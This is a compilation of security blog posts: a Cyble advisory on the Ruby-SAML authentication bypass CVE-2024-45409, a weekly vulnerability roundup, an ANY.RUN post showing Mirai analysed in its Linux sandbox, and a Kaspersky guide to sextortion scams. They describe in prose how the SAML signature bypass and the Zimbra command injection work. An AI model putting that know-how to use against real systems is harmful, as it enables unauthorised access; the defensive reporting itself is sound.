The post Cyber Information Gathering: Techniques <br>and Tools for Effective Threat Research  appeared first on ANY.RUN’s Cybersecurity Blog.

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Active Exploitation of SAML Vulnerability CVE-2024-45409 Detected by Cyble Sensors


On September 10, 2024, a critical vulnerability, CVE-2024-45409, was identified by ahacker1 of SecureSAML. The vulnerability was then patched in the Ruby-SAML library, which is widely used for implementing SAML (Security Assertion Markup Language) authorization.

This flaw affects Ruby-SAML versions up to 1.12.2 and between 1.13.0 and 1.16.0 and stems from an incorrect XPath selector that prevents the proper verification of the SAML Response signature. An unauthenticated attacker with access to a signed SAML document from a legitimate identity provider (IdP) can exploit this vulnerability by forging a SAML Response or Assertion. This allows the attacker to bypass the authentication mechanism and potentially gain unauthorized access to sensitive data and critical systems.

SAML is widely used in web applications, especially those that implement Single Sign-On (SSO) mechanisms for user authentication across different platforms or services. It is also used in multiple versions of GitLab Community Edition (CE) and Enterprise Edition (EE).

On September 17, 2024, GitLab issued an important update to address the critical vulnerability identified in the Ruby-SAML library. This update impacts multiple versions of GitLab Community Edition (CE) and Enterprise Edition (EE), specifically those released prior to 17.3.3, 17.2.7, 17.1.8, 17.0.8, and 16.11.10. Users are strongly encouraged to upgrade to these patched versions to protect from potential exploitation of this vulnerability.

Following GitLab’s patch, researchers from ProjectDiscovery provided a detailed analysis of the SAML vulnerability and demonstrated how it could be exploited to gain unauthorized access to GitLab accounts. The figure below shows the video demonstration of POC gaining unauthorized access to a GitLab account.

Amid these findings, Cyble Global Sensor Intelligence (CGSI) identified a scanning attempt associated with CVE-2024-45409.

Cyble Global Sensor Intelligence (CGSI) findings

On October 8, 2024, Cyble Global Sensor Intelligence (CGSI) identified attempts to exploit the newly disclosed vulnerability, CVE-2024-45409. Analysis of the detected URL patterns suggests that threat actors may be actively scanning for vulnerable GitLab accounts to exploit this particular flaw. This activity suggests a possible ongoing campaign aimed at exploiting CVE-2024-45409, potentially involving systematic probing of GitLab instances to identify entry points.

Vulnerability Details

Authentication bypass






Vulnerable Software Versions

Ruby-SAML in <= 12.2 and 1.13.0 <= 1.16.0


The Ruby SAML library is for implementing the client side of a SAML authorization. Ruby-SAML in <= 12.2 and 1.13.0 <= 1.16.0 does not properly verify the signature of the SAML Response. An unauthenticated attacker with access to any signed saml document (by the IdP) can thus forge a SAML Response/Assertion with arbitrary contents. This would allow the attacker to log in as an arbitrary user within the vulnerable system.

Technical details

SAML is a widely adopted protocol for exchanging authentication and authorization data between identity providers (IdPs) and service providers (SPs). A vital aspect of securing this exchange is verifying data integrity and authenticity through digital signatures and digest verification.

CVE-2024-45409 introduces a vulnerability that enables attackers to circumvent the signature validation process, provided they obtain the SAML Response issued by the identity provider. An attacker with access to any signed SAML document can forge a SAML Response or Assertion by inserting their own digest value within the samlp:extensions element. This alteration tricks the XPath parser, causing it to extract the smuggled DigestValue from the samlp:extensions element rather than the one in the SignedInfo block.

As a result, the attacker bypasses the signature verification, enabling them to authenticate their own forged assertion and effectively bypass the authentication mechanism.


CVE-2024-45409 presents a significant risk in the Ruby-SAML library. It enables attackers to forge SAML Responses and gain unauthorized access to systems due to inadequate verification of the SAML Response signature. This vulnerability highlights the urgent need for action, particularly as GitLab, a widely used platform, is especially susceptible to this issue. Furthermore, the recent detection of exploitation attempts by CGSI further underscores the severity of this threat.


GitLab advises self-managed users to implement two mitigation measures to lessen the risk of exploitation:

Enable two-factor authentication for all user accounts on the self-managed GitLab instance. (Note: Activating multi-factor authentication on the identity provider does not address this vulnerability.)

Disable the SAML two-factor bypass option within GitLab.


Update the Ruby-SAML library to the latest version, where the vulnerability has been patched.

Ensure multi-factor authentication (MFA) is enabled on your accounts to add an extra layer of security.

Organizations should conduct regular security awareness and information security training for employees.


The post Active Exploitation of SAML Vulnerability CVE-2024-45409 Detected by Cyble Sensors appeared first on Cyble.

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Weekly IT Vulnerability Report: Cyble Urges Fixes for Ivanti, Microsoft Dark Web Exploits

Key Takeaways

Cyble researchers have identified high-priority vulnerabilities in products from Ivanti, Microsoft, Qualcomm, Zimbra, and the Common Unix Printing System (CUPS).

Microsoft’s Patch Tuesday included five new zero-day vulnerabilities, two of which are being actively exploited – and Cyble researchers have observed threat actors discussing the other three zero-days on cybercrime forums.

Cyble also detected 14 vulnerability exploits discussed on dark web forums, suggesting that they may soon be under attack, if not already.


Cyble Research and Intelligence Labs (CRIL) investigated 22 vulnerabilities during the week of Oct. 2-8 and identified six products that security teams should prioritize for patching and mitigation.

Additionally, Cyble researchers detected 14 vulnerabilities and exploits shared on cybercrime forums that security analysts should also prioritize – including the three Microsoft zero-days not yet under active exploitation.

Cyble’s weekly IT vulnerability report covering the period of Oct. 2-8 also offered best practices that all security teams should follow.

Top IT Vulnerabilities This Week

CRIL researchers identified eight vulnerabilities in six products that security teams should prioritize; three affect Ivanti Cloud Services Appliances (CSA).

CVE-2024-9379, CVE-2024-9380, CVE-2024-9381: Ivanti CSA

These three critical vulnerabilities impact Ivanti Cloud Services Appliance (CSA), an internet appliance designed to facilitate secure communication and management of devices over the internet. It serves as a bridge between the core server and managed devices, enabling them to communicate even when they are behind firewalls or using proxies.

CVE-2024-9379 is an SQL injection flaw that a remote authenticated attacker with admin privileges can trigger. CVE-2024-9380 is an OS command injection vulnerability that allows a remote authenticated attacker with admin privileges to achieve remote code execution. CVE-2024-9381 is a path traversal vulnerability that allows a remote authenticated attacker with admin privileges to bypass restrictions. In a recent advisory, Ivanti disclosed attackers’ exploitation of CVE-2024- 9379, CVE-2024-9380, or CVE-2024-9381, chained with CVE-2024-8963. CISA also issued an advisory urging security teams to patch the flaws.

CVE-2024-47176: CUPS

This vulnerability impacts the Common Unix Printing System, an open-source printing system designed for Linux and other Unix-like operating systems, providing a standardized framework for managing and controlling printers, enabling computers to act as print servers that accept print jobs from client machines, process them, and send them to the appropriate printer. Recently, researchers disclosed that threat actors can exploit vulnerabilities to launch distributed denial-of-service (DDoS) attacks with a 600x amplification factor. Under certain conditions, attackers can chain the set of vulnerabilities in multiple components of CUPS to execute arbitrary code remotely on vulnerable machines. Cyble researchers had warned about the CUPS vulnerability the previous week and reiterated the warning as new exploits emerged.

CVE-2024-45519: Zimbra

This 9.8-severity vulnerability impacts Zimbra Collaboration Suite (ZCS), an integrated communication and collaboration platform designed for businesses and organizations, integrating various tools for email, calendaring, contact management, and document sharing. Unauthenticated users can exploit the flaw to execute commands. Recently, researchers disclosed that attackers are actively exploiting the RCE vulnerability that can be triggered simply by sending specially crafted emails with commands to execute in the CC field, which are then executed when the postjournal service processes the email. Cyble researchers also observed multiple discussions of the vulnerability on the dark web (see Dark Web section below).

CVE-2024-43047: Qualcomm

This zero-day vulnerability in the Digital Signal Processor (DSP) service that impacts dozens of Qualcomm chipsets can also be leveraged in spyware campaigns targeting Android devices. Cyble published a report and has highlighted the exploitation of CVE-2024-43047 in targeted attacks. OEMs are encouraged to apply the provided patches immediately. Users concerned about their devices should reach out to manufacturers for specific patch details. 

CVE-2024-43572 and CVE-2024-43573: Microsoft

Microsoft’s October 2024 Patch Tuesday included security updates for 118 flaws, including five publicly disclosed zero-days, two of which are being actively exploited: CVE-2024-43572, a Remote Code Execution vulnerability in Windows Management Console, and CVE-2024-43573, a spoofing vulnerability in the Windows MSHTML Platform.

Cyble researchers observed cybercrime exploit discussions on the other zero days reported by Microsoft (see Dark Web section below): CVE-2024-38200, a Microsoft Office Spoofing vulnerability; CVE-2024-29050, a Remote Code Execution (RCE) flaw in Windows 10 for x32- and x64-based Systems; and CVE-2024-6769, a Privilege Escalation vulnerability in Windows 10, Windows 11 – 10.0.0, Windows Server 2016, Windows Server 2019 – 10.0.0.

Dark Web and Cybercrime Forum Exploits

CRIL observed multiple Telegram channels and cybercrime forums sharing or discussing exploits weaponizing different vulnerabilities. The vulnerabilities under discussion included:

CVE-2024-38200: A critical vulnerability affecting multiple versions of Microsoft Office that arises from improper handling of certain document properties within Microsoft Office applications. It could potentially expose sensitive information such as NTLM hashes.

CVE-2024-29050: A Windows Cryptographic Services Remote Code Execution (RCE) vulnerability that arises from truncation errors that occur when a primitive data type is cast to a smaller size, resulting in potential data loss during conversion.

CVE-2024-6769: A vulnerability affecting multiple versions of Microsoft Windows, including Windows 10, Windows 11, and various Windows Server editions. The vulnerability exploits a combination of DLL Hijacking and Activation Cache Poisoning, allowing an attacker to elevate privileges from a medium to a high-integrity process without triggering a User Account Control (UAC) prompt.

CVE-2024-7479: A critical security vulnerability affecting TeamViewer’s Remote Client and Remote Host products for Windows. The vulnerability arises from improper verification of cryptographic signatures during the installation of VPN drivers, allowing attackers with local, unprivileged access to escalate their privileges and execute arbitrary code.

CVE-2024-7481: A critical security vulnerability affecting TeamViewer’s Remote Client and Remote Host products for Windows. The vulnerability arises from improper verification of cryptographic signatures during the installation of printer drivers, allowing attackers with local, unprivileged access to escalate their privileges and execute arbitrary code.

CVE-2024-36435: A critical vulnerability in the Baseboard Management Controller (BMC) firmware of several Supermicro enterprise products. The vulnerability allows unauthenticated attackers to exploit a buffer overflow, leading to remote code execution (RCE).

CVE-2024-38816: A high-severity path traversal vulnerability discovered in the Spring Framework and VMWare Tanzu Spring platform, affecting multiple versions. This vulnerability allows attackers to exploit improper handling of static resources, potentially gaining unauthorized access to sensitive files on the server.

CVE-2024-45519: Proofs of Concept (PoCs) of this widely reported Zimbra vulnerability are shared on multiple Telegram channels. It is a critical Remote Code Execution (RCE) vulnerability that was discovered in the postjournal service of the Zimbra Collaboration Suite, a widely used email and collaboration platform.

CVE-2024-45409: A critical vulnerability affecting the Ruby SAML and OmniAuth SAML libraries. This flaw allows unauthenticated attackers to bypass Security Assertion Markup Language (SAML) authentication mechanisms by exploiting weaknesses in the signature verification process of SAML responses. Cyble honeypot sensors detected active attacks on this vulnerability.

CVE-2024-26304: A critical vulnerability affecting HPE Aruba Devices, classified as an unauthenticated buffer overflow vulnerability in the L2/L3 Management Service accessed via the PAPI Protocol. The vulnerability allows attackers to send specially crafted packets to the PAPI UDP port (8211), potentially enabling them to execute arbitrary code as a privileged user on the affected system.

CVE-2024-5830: A critical security vulnerability was discovered in Google Chrome’s V8 JavaScript engine, affecting versions prior to 126.0.6478.54. This vulnerability is a type confusion bug, which an attacker can exploit to execute arbitrary code within the Chrome renderer sandbox simply by enticing a victim to visit a malicious website.

CVE-2024-44193: This is a vulnerability affecting Apple iTunes for Windows, specifically versions prior to 12.13.3. The vulnerability allows local attackers to elevate their privileges on affected systems, posing significant security risks.

CVE-2024-8275: A threat actor (TA) shared a PoC on a forum for a critical SQL injection vulnerability discovered in the Events Calendar Plugin for WordPress. The vulnerability affects all versions up to and including 6.6.4 and arises from insufficient input validation in specific functions.

CVE-2024-43363: A TA on a forum shared a PoC for a high-severity vulnerability affecting Cacti, a fault management framework. The vulnerability allows attackers to exploit the system remotely, potentially compromising sensitive data and system integrity.

Cyble Recommendations

To protect against these vulnerabilities and exploits, organizations should implement the following best practices:

To mitigate vulnerabilities and protect against exploits, regularly update all software and hardware systems with the latest patches from official vendors.

Develop a comprehensive patch management strategy that includes inventory management, patch assessment, testing, deployment, and verification. Automate the process where possible to ensure consistency and efficiency.

Divide your network into distinct segments to isolate critical assets from less secure areas. Use firewalls, VLANs, and access controls to limit access and reduce the attack surface exposed to potential threats.

Create and maintain an incident response plan that outlines procedures for detecting, responding to, and recovering from security incidents. Regularly test and update the plan to ensure its effectiveness and alignment with current threats.

Implement comprehensive monitoring and logging solutions to detect and analyze suspicious activities. Use SIEM (Security Information and Event Management) systems to aggregate and correlate logs for real-time threat detection and response.

Subscribe to security advisories and alerts from official vendors, CERTs, and other authoritative sources. Regularly review and assess the impact of these alerts on your systems and take appropriate actions.

Conduct regular vulnerability assessment and penetration testing (VAPT) exercises to identify and remediate vulnerabilities in your systems. Complement these exercises with periodic security audits to ensure compliance with security policies and standards.


These vulnerabilities highlight the urgent need for security teams to prioritize patching critical vulnerabilities in major products. With increasing discussions of these exploits on dark web forums, organizations must stay vigilant and proactive. Implementing strong security practices is essential to protect sensitive data and maintain system integrity.

The post Weekly IT Vulnerability Report: Cyble Urges Fixes for Ivanti, Microsoft Dark Web Exploits appeared first on Cyble.

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ANY.RUN’s Upgraded Linux Sandbox for Fast and Secure Malware Analysis

At ANY.RUN, we’re always working to improve our services, and this time, we’ve focused on making our Linux sandbox even better. We’ve fine-tuned every detail to ensure it runs as smoothly and reliably as our Windows environment.  

From bug fixes to feature enhancements, our Linux sandbox is now more powerful and stable than ever, giving you a seamless experience when analyzing Linux malware. 

What’s Updated in ANY.RUN’s Linux Sandbox? 

We’ve packed our latest update with powerful new features and improvements that upgrade both performance and usability.  

Here’s what’s new in our Linux sandbox and how these enhancements benefit you: 

Stable Chrome browser by default: We’ve integrated a stable version of Chrome as the default browser for Linux environments. This ensures smoother, faster browsing and more reliable interaction with suspicious websites during your analysis sessions. 

Chrome browser inside ANY.RUN’s Linux sandbox

Improved process tree performance: We’ve eliminated the lag that previously occurred when navigating the process tree. Now, you can explore process details without any delays, making malware behavior analysis much more efficient. 

Improved process tree inside Linux sandbox

Additional file uploads for Linux: This means that you can now upload files in real time while an analysis session is running, enabling a more dynamic investigation process. Instead of having to restart or set up a new session for each file, you can simply upload more files during the current session. 

Additional file uploads in updated Linux sandbox

File events tracking: This feature allows users to monitor and log every action the malware performs on files within the Linux sandbox environment. For example, if the malware creates, modifies, deletes, or moves files, those actions are now captured and presented in the analysis report. 

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Now you can get a clearer view of how the malware interacts with the file system, providing deeper insights into the malware’s behavior and making it easier to trace malicious activities. 

File modifications demonstrated in ANY.RUN’s Linux sandbox

Clipboard feature: A new clipboard function has been introduced, allowing you to copy and paste content directly within the sandbox. This small addition significantly improves workflow and efficiency during interactive sessions. 

VM Clipboard in Linux sandbox

Improved Locale (OS Language) selection: We’ve enhanced the Locale (OS Language) choice feature in the Linux sandbox, making it more reliable and error-free. Now, during configuration, you can easily select the desired locale from the dropdown menu, ensuring that the operating system language is set correctly for your analysis session. 

This improvement is crucial because malware often behaves differently depending on the system’s language settings. For example, some malware may only activate in specific locales, or attackers may target systems based on region-specific characteristics. By choosing the correct locale, you can replicate real-world scenarios more accurately.

Improved Locale selection in Linux sandbox 

Internal stability improvements: We’ve also carried out other optimizations to ensure the Linux sandbox runs as smoothly and reliably as our Windows sandbox.  

These improvements include removing various bugs, making performance tweaks, and implementing backend updates. While these changes might not be immediately visible, they play a crucial role in enhancing the overall stability and efficiency of the Linux sandbox, giving you a seamless experience when analyzing malware. 

Let’s Analyze Mirai Malware in Linux Sandbox 

To see the updated Linux sandbox in action, let’s dive into how one of the most infamous Linux malware threats, Mirai, can be analyzed in just a few steps. 

It’s easy, fast and straightforward: 

1. Choose the right option for analysis 

To begin the analysis, we need to choose one of the options: 

Upload the suspicious file: You can explore a variety of formats, including shell scripts, ELF executables, tarballs, and more. Even common files like Word documents, which might carry hidden malware targeting Linux, can be checked thoroughly. 

Copy and paste the suspicious link: Safely browse shady websites, whether they’re suspected of hosting malware or trying to pull off phishing scams. 

Linux malware analysis options inside ANY.RUN 

2. Configure the sandbox settings

After selecting the option you need, you can adjust the sandbox settings. A key step is choosing “Linux OS” from the list of operating systems in the dropdown menu. This ensures the analysis session will run on a Linux system, providing the right environment for your testing. 

Ready? Hit that “Run analysis” button and start interacting with the file or link to check if it’s malicious. 

In our case, we’re running a malware analysis session with Mirai: 

Mirai malware analyzed in ANY.RUN’s Linux sandbox 

3. Start analyzing the Linux malware 

After launching the analysis, the Linux sandbox will display tags related to the threat at hand.  

Just take a glance at the top-right corner of the screen. In our case, the sandbox provides tags “mirai” and “botnet”.

Once you finish the analysis, the sandbox will show the final verdict, letting you know if the file or link is malicious or safe.  

Malicious activity label displayed in ANY.RUN’s Linux sandbox

If you want more details about the specific malware, you can click on the links provided by the Tracker located next to the indicators. This will take you to the malware tracker, where you can read a detailed description of the malware, including its origin, execution analysis, distribution methods, and much more. 

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Detailed malware processes 

Next, over on the right side, you’ll find the process tree, showing all the parent PIDs and their child PIDs. This gives you a clear view of how malware behaves across processes. Want more details? Just click on any process, and you’ll get a deep dive into its activity. 

Process details displayed in ANY.RUN’s Linux malware 

Network analysis details 

Below the virtual machine, you’ll also see a breakdown of all the network activity—split into HTTP requests, connections, DNS requests, and detected threats. This info is key for understanding the malware’s behavior.  

HTTP requests in ANY.RUN’s sandbox

For example, in our analysis session with Mirai malware, we can see how it uploads ELF files designed for specific system architectures. 

Static discovery with ELF execution 

By piecing together these insights, you get a comprehensive look at how the malware operates, making it easier to investigate and respond to potential threats. 

Collection of IOCs and network reputation 

For further analysis of the malware, you can easily gather all the IOCs (Indicators of Compromise) linked to the task by clicking the IOC button on the right side of the screen. 

No need to jump between tabs—everything you need is collected in one place, making it quicker and easier to manage.

Plus, before each IOC, you’ll find a network reputation indicator that lets you know whether the item is whitelisted or flagged as malicious, so you can prioritize it in your investigation. 

IOCs gathered inside ANY.RUN’s Linux sandbox 

MITRE ATT&CK tactics and techniques 

ANY.RUN’s Linux sandbox also includes the MITRE ATT&CK Matrix framework, which is super helpful for understanding the techniques and tactics used in malware attacks.  

Simply click the ATT&CK button, and you’ll be redirected to a new page showing all the techniques employed in the specific malware activity.  

MITRE ATT&CK tactics and techniques used for Mirai malware attack

For example, in our Mirai malware analysis, one of the tactics used by the attackers was leveraging wget to download additional content—highlighting just how attackers manipulate common tools for malicious purposes. 

MITRE ATT&CK Matrix framework techniques displayed in ANY.RUN’s Linux sandbox 

Process graph 

ANY.RUN’s Linux sandbox offers a process graph that visually maps out the entire malware attack, showing every action the malware takes from start to finish. This graph gives you a clear, easy-to-understand view of the attack’s flow—how it starts, what files are accessed, and what processes are executed. 

This feature is especially useful for more complex malware, where multiple actions happen simultaneously. You can zoom in on individual processes or view the bigger picture to get a complete understanding of how malware spreads and what it’s trying to accomplish. 

Here is the process graph of our analysis, showing how Mirai infiltrates the system: 

Process graph of Mirai malware  

Mirai malware analysis text report 

During our interactive analysis of Mirai malware in the Linux sandbox, we saw just how detailed the investigation can get. From process trees to network interactions, the sandbox provides a deep dive into every aspect of the malware’s behavior. 

Mirai text report generated by ANY.RUN’s Linux sandbox 

If you need to collect and review all this information later, you can easily do so by clicking the “Text Report” button in the upper right corner. This feature gathers all the critical details into one report, combining everything from the process graphs to the full scope of network activity for further analysis.  

Learn more: Malware Analysis Report in One Click 

Why Use ANY.RUN’s Linux Sandbox? 

ANY.RUN’s Linux sandbox is built for both security professionals and beginners who need a reliable and fast environment to analyze malware targeting Linux systems. 

Real-time analysis: Watch malware activity live and react to the behavior instantly. 

Full isolation: Safely inspect files and URLs without risking your main system. 

Comprehensive threat detection: Handle all Linux malware types, including backdoors and crypto miners. 

Easy setup: Start a session in just a few clicks—no complex setup required. 

Interactive environment: Interact directly with the malware and see its impact in real-time. 

Centralized IOCs: All indicators of compromise are gathered in one spot for easy access. 

Secure Cloud: Everything runs safely in the cloud—no need for local software. 

Detailed report: Receive a comprehensive analysis report after each session, including all critical findings. 

Experience ANY.RUN’s Full Power with a Free Trial 

Unlock the full potential of ANY.RUN with advanced features to elevate your malware analysis: 

Windows 11 VM

Private mode

Team collaboration tools 

API access and integration with Splunk and OpenCTI

And more

Request free trial → 

About ANY.RUN   

ANY.RUN helps more than 400,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.   

The post ANY.RUN’s Upgraded Linux Sandbox <br>for Fast and Secure Malware Analysis appeared first on ANY.RUN’s Cybersecurity Blog.

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What to do if you receive a sextortion email | Kaspersky official blog

Sextortion — a portmanteau of “sex” and “extortion” — originally referred to blackmail using compromising photos or videos obtained either by hacking a victim’s device or voluntarily from the victim themselves. While this form of crime still exists, today’s sextortioners are far less likely to be in the possession of any juicy material. Some varieties of sextortion work even when the victim knows for certain that no compromising material featuring them could possibly exist. Let’s get to the bottom (so to speak) of all the latest sextortion scams, and ways to counter them.

“Your spouse is cheating on you”

This fresh sextortion tactic preys on jealousy instead of shame. A spouse receives an email from a “security company” saying it has gained access to (read: hacked) their other half’s personal devices and found proof of infidelity. For details, including a downloaded data archive, the recipient is invited to follow the link kindly provided. Of course, the attackers have no data at all other than the names and email addresses of the couple, and the link is there to extract money.

“I recorded you on video”

This is the classic sextortion scheme. The victim receives an email claiming that the sender hacked their computer or smartphone and recorded them through the webcam while they were browsing porn sites. To stop friends and family from seeing the video, the “hackers” demand an urgent payment in cryptocurrency. To make it more convincing, they may address the victim by name and insert in the email an actual password the recipient has used for some accounts. In reality, the sextortioners simply buy databases of stolen credentials, thousands of which are available on the dark web, and then fire out standard emails with passwords from this database to the corresponding addresses.

“You have a beautiful home”

To target those unfazed by cybervillains knowing their password, a new scheme was invented. The perpetrator mentions that if the victim fails to contact the attackers about the hush payment, they’ll come to discuss the matter in person. To add weight to the threat, the email includes a photo of the victim’s home taken from Google Maps. Obviously, for this trick to work, the attackers need databases that contain not only emails and passwords but also home addresses, which they can get from online-store data leaks.

“I recorded you on video, see for yourself”

Another popular sextortion scam doesn’t demand a cryptocurrency payment but instead tries to install malware on the victim’s computer. An email invites the recipient to watch a video to see how serious the threat is, but to do so they need to visit a website and install a special player — infected, of course.

“You’ve been deepfaked”

This relatively new version of the scam works quite well on people who are sure that no compromising videos of them exist. After all, deepfake videos and deepfake porn with celebrities’ faces superimposed on porn actors’ bodies have been widely reported in the media. The scam comes in two flavors: in one, the attackers simply claim to have made a deepfake; in the other, they actually have. It’s easy to tell them apart: in the latter, the deepfake is immediately presented to the victim — sometimes even in the form of a physical letter delivered to their work address. To make such a deepfake, of course, good-quality photos and videos of the victim are needed. You can reduce your chances of being attacked in this way by not posting countless selfies and other clear shots of your face on social media.

“You’re going to jail”

Another variety of sextortion is a scam email accusing the recipient of possessing child pornography. The sender claims to be work for law enforcement and is preparing a list of pedophiles for mass arrest. The recipient is among them, states the email. To get their name removed from the list, the victim is invited to pay a ransom. Criminals can be quite creative with their threats, so some variants of the scheme are even more outlandish: the sender may “work for the CIA”, “manage a website for hiring hitmen”, or even “have planted a bomb under your house”.

What to do if you receive a sextortion email

Don’t panic. Nearly all sextortion scams are just empty threats. Scammers send out millions of identical emails and do nothing to those who ignore them (since that’s all they can do). Therefore, the best response is to mark the email as spam and delete it. By the way, Kaspersky Plus and Kaspersky Premium users are protected against the vast majority of spam, as well as malicious websites and apps that are distributed under the guise of such spam.

The exception is when you know the sender personally, or there are real incriminating photos and videos attached to the email. In this case, you could be dealing not only with sextortion but also with defamatory deepfakes — two very serious crimes in most countries. Put all embarrassment aside and contact the police immediately.

How to guard against intimate photo leaks

If you’ve ever taken a nude, sent it to someone, or saved it on a device, read our detailed guide on how to safely store intimate photos and videos, and what to do if they still leak online (spoiler: they can still be removed even from the internet!)

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